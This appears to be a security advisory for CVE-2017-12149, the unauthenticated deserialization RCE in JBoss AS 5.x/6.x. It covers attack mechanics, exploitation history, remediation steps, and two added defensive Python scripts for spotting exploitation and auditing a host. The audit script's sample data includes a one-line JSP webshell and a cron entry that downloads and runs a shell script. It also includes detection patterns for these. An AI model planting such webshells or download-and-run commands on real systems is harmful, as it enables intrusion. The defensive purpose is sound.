CVE-2017-12149 — Red Hat JBoss Application Server Remote Code Execution Vulnerability

CVE-2017-12149

JBoss AS 5.x/6.x — Unauthenticated Java Deserialization via /invoker/readonly HTTP Endpoint; CRITICAL 9.8; Cryptominer and Ransomware Mass Exploitation

What Is JBoss Application Server?

Red Hat JBoss Application Server (JBoss AS), now known as WildFly, is an open-source Java EE application server used by enterprise organizations worldwide for mission-critical Java applications. JBoss AS 5.x and 6.x (shipped as Red Hat Enterprise Application Platform 5.2) were widely deployed in financial services, healthcare, government, and manufacturing. JBoss servers run with broad access to internal networks, databases, and backend systems — a compromised JBoss instance provides an attacker with extensive enterprise access. The /invoker/ URL path on JBoss provided a Java serialization-based RPC mechanism intended for internal cluster communication that, when left exposed and unauthenticated, became an unauthenticated RCE endpoint accessible from the internet.

Overview

Actively Exploited. This vulnerability was added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on December 10, 2021. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2017-12149 is a critical unauthenticated remote code execution vulnerability in JBoss Application Server (JBoss AS 5.x and 6.x, shipped in Red Hat EAP 5.2) caused by unsafe Java deserialization at the /invoker/readonly HTTP endpoint. The endpoint accepts and deserializes Java-serialized objects from unauthenticated HTTP requests — any attacker who can reach the JBoss HTTP port can send a malicious serialized payload that executes arbitrary code as the JBoss server process. This vulnerability has been exploited since at least 2015 for cryptomining, botnet recruitment, and ransomware delivery, and continues to be exploited against unpatched legacy JBoss deployments. CISA added CVE-2017-12149 to the KEV catalog in December 2021.

Affected Versions

JBoss Version                       Status
JBoss AS 5.x                        Vulnerable
JBoss AS 6.x                        Vulnerable
Red Hat EAP 5.2                     Vulnerable
JBoss AS 7.x / WildFly              Not affected (different architecture)
Patched Red Hat EAP 5.x versions    Fixed

Technical Details

Root Cause: Unauthenticated Java Deserialization on /invoker/readonly

CVE-2017-12149 is a deserialization vulnerability (CWE-502) in JBoss Application Server. The /invoker/ URL paths on JBoss AS 5.x/6.x expose an HTTP-accessible JMX invoker for remote Java management — designed for internal cluster management but often left accessible without authentication:

Vulnerable endpoints:

  • /invoker/readonly — HTTP invoker endpoint that deserializes MarshalledInvocation objects
  • /invoker/JMXInvokerServlet — JNDI-based invoker with similar deserialization

Attack mechanics:

  1. Attacker sends an HTTP POST to /invoker/readonly on the target JBoss server
  2. The request body contains a Java-serialized MarshalledInvocation object wrapping a malicious gadget chain payload (typically using Apache Commons Collections, Groovy, or similar libraries available on the JBoss classpath)
  3. JBoss deserializes the payload using Java ObjectInputStream without any authentication check or class filtering
  4. The gadget chain executes during deserialization, running arbitrary OS commands as the JBoss process user (often root or a highly privileged service account)
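
The request shape in steps 1 to 4 leaves a recognizable trace on the wire: a POST to one of the invoker paths whose body begins with the standard Java serialization stream header (bytes AC ED 00 05). The following Python detector is an added example, not code from this advisory or from Red Hat. It assumes a reverse proxy or WAF in front of JBoss that writes combined-format access logs and can expose raw request bodies; the log lines and body below are constructed, and the endpoint paths are the two named above.

```python
"""Spot CVE-2017-12149 exploitation attempts in traffic reaching a JBoss host.

Added example, not from this advisory or from Red Hat. It assumes a reverse
proxy or WAF in front of JBoss that writes combined-format access logs and
can expose raw request bodies; the log lines and body below are constructed.
The endpoint paths are the two named in the advisory.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Standard Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Invoker servlets from the advisory; on a hardened host neither should answer.
INVOKER_PATHS = ("/invoker/readonly", "/invoker/JMXInvokerServlet")

# Combined log format: host ident user [time] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    src: str
    time: str
    method: str
    path: str
    status: int
    reason: str


def is_invoker_path(path: str) -> bool:
    """True for the invoker endpoints, ignoring any query string."""
    return path.split("?", 1)[0].startswith(INVOKER_PATHS)


def classify_body(body: bytes) -> Optional[str]:
    """Flag a request body that is a raw Java serialized stream (what the
    invoker deserializes); legitimate browser traffic never starts this way."""
    if body.startswith(JAVA_SERIAL_MAGIC):
        return "java-serialized body"
    return None


def scan_access_log(lines: List[str]) -> List[Finding]:
    """Every request to an invoker endpoint is a finding; POSTs are the
    exploitation shape from step 1, anything else is reconnaissance."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_invoker_path(m["path"]):
            continue
        status = int(m["status"])
        if m["method"] == "POST":
            reason = "POST to invoker endpoint (possible deserialization payload)"
            if status == 200:
                reason += "; served with 200, endpoint is reachable"
        else:
            reason = "non-POST request to invoker endpoint (probe)"
        findings.append(Finding(m["src"], m["time"], m["method"], m["path"], status, reason))
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "POST /invoker/readonly HTTP/1.1" 200 1534',
    '198.51.100.9 - - [10/Dec/2021:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 4122',
    '203.0.113.7 - - [10/Dec/2021:03:14:12 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 403 281',
    '192.0.2.44 - - [10/Dec/2021:03:15:00 +0000] "GET /invoker/readonly?x=1 HTTP/1.1" 404 0',
]
# Constructed body prefix: a serialized stream header followed by an object tag.
SAMPLE_BODY = b"\xac\xed\x00\x05sr\x00"

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.time} {f.src} {f.method} {f.path} -> {f.status}: {f.reason}")
    print("body:", classify_body(SAMPLE_BODY))
```

A 200 on a POST to either path is the most urgent finding: it means the invoker servlet is still deployed and answering, so the host should be treated as exposed (and, per the remediation section, as potentially compromised) until the servlets are removed or blocked. A 403 or 404 shows the block is in place but still records who is probing.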

Why JBoss AS was particularly vulnerable:

  • JBoss AS 5.x/6.x shipped with Apache Commons Collections on the default classpath — providing reliable gadget chains for deserialization exploitation
  • The /invoker/readonly endpoint was accessible over HTTP (port 8080) without authentication by default
  • JBoss servers were frequently internet-exposed to allow remote access to Java EE applications

Attack Characteristics

Attribute            Detail
Attack Vector        Network — HTTP POST to /invoker/readonly
Authentication       None required
Gadget Chain         Commons Collections (on JBoss default classpath)
Impact               RCE as JBoss process user
Mass Exploitation    Cryptominers, botnets, ransomware

Discovery

The exploitability of JBoss's /invoker/readonly endpoint was known to security researchers well before the 2017 CVE assignment; exploitation was observed in the wild as early as 2015 for botnet recruitment. The CVE was formally assigned in 2017 when mass exploitation reached significant scale.

Exploitation Context

  • Pre-CVE exploitation history: The JBoss deserialization attack path was publicly known and actively exploited for botnet recruitment (SambaCry, Mirai variants for servers) before the formal CVE assignment; CISA's 2021 KEV addition reflects the ongoing exploitation of legacy JBoss installations rather than a new discovery
  • Cryptomining campaigns: The 2017-2018 cryptomining epidemic heavily targeted JBoss AS servers — the combination of server-grade hardware, persistent availability, and unauthenticated RCE made JBoss ideal for Monero mining; automated scanners identified and compromised vulnerable instances within hours of exposure
  • Ransomware deployment: Ransomware operators used CVE-2017-12149 for initial access to enterprise networks via exposed JBoss servers, gaining a foothold in the server tier before moving laterally to encrypt domain-joined systems; CISA's KEV entry records known ransomware use for this CVE
  • Legacy deployment persistence: JBoss AS 5.x/6.x reached end of life before 2017, yet many organizations continued running these versions for legacy Java EE applications; the CISA KEV addition in 2021 — four years after the CVE — reflects confirmed ongoing exploitation of organizations that never patched or migrated their JBoss deployments
  • CISA KEV (2021): Added December 10, 2021 as part of a batch of Java deserialization CVEs with confirmed ongoing exploitation

Remediation

CISA BOD 22-01 Deadline: June 10, 2022. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

  1. Apply Red Hat EAP patches — apply Red Hat security errata for JBoss EAP 5.2 to address CVE-2017-12149. Red Hat provides patch details via the Red Hat Customer Portal for supported EAP versions.

  2. Migrate off JBoss AS 5.x/6.x — both versions are end-of-life and no longer receive security updates; migrate applications to JBoss EAP 7.x, WildFly, or another supported Java EE/Jakarta EE application server.

  3. Immediately block or remove invoker servlets — if upgrading is not immediately possible, remove or restrict access to the vulnerable endpoints:

    • Remove the /invoker/ servlets from the JBoss deployment configuration
    • Block HTTP access to port 8080 (and 4444, 4445, 8009) at the firewall level from untrusted networks

  4. Do not expose JBoss directly to the internet — JBoss application servers should be behind a load balancer, reverse proxy, or WAF; direct internet exposure of the JBoss HTTP port is the primary enabler of CVE-2017-12149 exploitation.

  5. Audit for compromise — JBoss servers exposed without authentication should be treated as potentially compromised; check for unexpected processes (miners, shells), new cron jobs, modified WAR files, and webshells in the deployment directories.
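
Step 5 is a checklist of four artifact classes. The following Python audit is an added example, not code from this advisory or from Red Hat, that turns that checklist into repeatable checks. It takes its inputs as plain data (a snapshot of the deployment tree, a baseline of known-good WAR hashes, crontab text, and `ps` output) so the same logic runs against a live host or a collected image. All sample data below is constructed; the miner process names and webshell patterns are assumptions drawn from common tradecraft, not from the advisory.

```python
"""Audit a JBoss AS host for post-exploitation artifacts (remediation step 5).

Added example, not from this advisory or from Red Hat. Inputs are passed in
as plain data (a file snapshot, crontab text, ps output) so the same checks
run against a live host or a collected forensic image. The deploy paths,
baseline hashes, crontab and process list below are constructed; the miner
names and webshell patterns are assumptions drawn from common tradecraft.
"""
import hashlib
import re
from typing import Dict, List

# Command execution from a JSP page: the core of most Java webshells.
WEBSHELL_PATTERNS = [
    re.compile(rb"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec"),
    re.compile(rb"new\s+ProcessBuilder\s*\("),
]
# Cron entries that fetch and run code from the network or from scratch dirs.
CRON_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    re.compile(r"(/tmp|/dev/shm|/var/tmp)/\S+"),
]
# Well-known cryptominer process names (assumed indicator list).
MINER_NAMES = ("xmrig", "minerd", "kdevtmpfsi", "kinsing")
# Interpreters that a JBoss java process has no business spawning directly.
SHELLS = ("sh", "bash", "dash", "perl", "python")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def find_modified_wars(snapshot: Dict[str, bytes], baseline: Dict[str, str]) -> List[str]:
    """WAR/EAR files whose hash differs from the deployment baseline or that are new."""
    return [path for path, data in sorted(snapshot.items())
            if path.endswith((".war", ".ear")) and baseline.get(path) != sha256(data)]


def find_webshell_candidates(snapshot: Dict[str, bytes]) -> List[str]:
    """JSP files inside the deployment tree that execute OS commands."""
    return [path for path, data in sorted(snapshot.items())
            if path.endswith(".jsp") and any(rx.search(data) for rx in WEBSHELL_PATTERNS)]


def find_suspicious_cron(crontab: str) -> List[str]:
    """Non-comment crontab lines that download-and-execute or run from /tmp-like dirs."""
    return [line for line in crontab.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and any(rx.search(line) for rx in CRON_PATTERNS)]


def find_suspicious_processes(ps_lines: List[str], jboss_pid: int) -> List[str]:
    """Miners by name, plus shells whose parent is the JBoss java process.

    ps_lines is the output of `ps -eo pid,ppid,user,comm,args`, header included.
    """
    hits = []
    for line in ps_lines[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        _pid, ppid, _user, comm, args = parts
        if any(name in args for name in MINER_NAMES):
            hits.append(line)
        elif ppid.isdigit() and int(ppid) == jboss_pid and comm in SHELLS:
            hits.append(line)
    return hits


# --- constructed sample data -------------------------------------------------
SNAPSHOT = {
    "deploy/app.war": b"PK\x03\x04 app build 42",
    "deploy/ROOT.war": b"PK\x03\x04 ROOT build 42 + injected class",
    "deploy/app.war/cmd.jsp": b'<% Runtime.getRuntime().exec(request.getParameter("c")); %>',
    "deploy/app.war/index.jsp": b"<html>hello</html>",
}
# Hashes recorded when the deployment was last known good (ROOT.war has since changed).
BASELINE = {
    "deploy/app.war": sha256(b"PK\x03\x04 app build 42"),
    "deploy/ROOT.war": sha256(b"PK\x03\x04 ROOT build 42"),
}
CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://203.0.113.5/x.sh | sh
"""
PS_OUTPUT = [
    "PID PPID USER COMM ARGS",
    "1203 1 jboss java java -Dprogram.name=run.sh org.jboss.Main -c default",
    "4411 1203 jboss sh sh -c /tmp/.x/run",
    "4412 4411 jboss kdevtmpfsi /tmp/kdevtmpfsi",
    "4500 1 root sshd /usr/sbin/sshd -D",
]


def run_audit() -> Dict[str, List[str]]:
    return {
        "modified_wars": find_modified_wars(SNAPSHOT, BASELINE),
        "webshell_candidates": find_webshell_candidates(SNAPSHOT),
        "suspicious_cron": find_suspicious_cron(CRONTAB),
        "suspicious_processes": find_suspicious_processes(PS_OUTPUT, jboss_pid=1203),
    }


if __name__ == "__main__":
    for category, items in run_audit().items():
        print(f"{category}: {len(items)}")
        for item in items:
            print("  ", item)
```

The WAR check only works if a hash baseline was captured before exposure; without one, fall back to comparing against the build artifacts in your release pipeline. The process check deliberately keys on parentage as well as names, because a shell whose parent is the application server's java process is the direct consequence of the gadget chain in step 4 regardless of what the shell goes on to run.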

Key Details

Property                 Value
CVE ID                   CVE-2017-12149
Vendor / Product         Red Hat — JBoss Application Server
NVD Published            2017-10-04
NVD Last Modified        2025-10-22
CVSS 3.1 Score           9.8
CVSS 3.1 Vector          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity                 CRITICAL
CWE                      CWE-502 — Deserialization of Untrusted Data
CISA KEV Added           2021-12-10
CISA KEV Deadline        2022-06-10
Known Ransomware Use     Yes

CVSS 3.1 Breakdown

Metric                   Value
Attack Vector            Network
Attack Complexity        Low
Privileges Required      None
User Interaction         None
Scope                    Unchanged
Confidentiality          High
Integrity                High
Availability             High

Required Action

CISA BOD 22-01 Deadline: 2022-06-10. Apply updates per vendor instructions.

Timeline

Date          Event
2017-09-26    Red Hat releases patches for JBoss EAP addressing CVE-2017-12149
2017-10-04    CVE-2017-12149 published by NVD
2021-12-10    Added to CISA Known Exploited Vulnerabilities catalog
2022-06-10    CISA BOD 22-01 remediation deadline

References

Resource                                    Type
NVD — CVE-2017-12149                        Vulnerability Database
CISA KEV Catalog Entry                      US Government
Red Hat CVE Advisory — CVE-2017-12149       Vendor Advisory